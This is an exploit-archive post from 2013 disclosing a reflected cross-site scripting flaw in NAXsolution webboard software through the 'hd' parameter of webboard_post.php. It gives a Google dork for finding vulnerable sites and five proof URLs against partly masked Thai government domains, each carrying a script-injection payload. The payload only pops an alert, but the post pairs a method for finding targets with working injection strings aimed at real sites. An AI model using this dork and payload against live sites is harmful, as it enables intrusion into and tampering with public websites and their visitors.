Home / exploits NAXsolution Cross site scripting vulnerability
Posted on 05 September 2013
#************************************************************** # [+] Exploit Title : NAXsolution Cross site scripting vulnerability # # [+] Software link : http://www.naxsolution.com # # [+] Exploit Author : Ashiyane Digital Security Team # # [+] Tested on: Windows 7 , Linux # # [+] Google Dork : intext:"จัดทำโดย : NAXsolution.com" # # [+] Date: 2013/09/04 # -------------------------------------------------------------------- # [+] Exploit : Cross site scripting # # [+] Location : [Target]/webboard_post.php?hd=[xss] # #------- # Proof: #------- # # http://www.baXaipa.go.th/webboard_post.php?hd="/><script>alert(1);</script> # # http://www.banmXluea.go.th/webboard_post.php?hd="/><script>alert(1);</script> # # http://www.baXtak.go.th/webboard_post.php?hd="/><script>alert(1);</script> # # http://www.choXkab.go.th//webboard_post.php?hd="/><script>alert(1);</script> # # http://www.waXao.go.th//webboard_post.php?hd="/><script>alert(1);</script> # ###################### discovered by : ACC3SS ######################
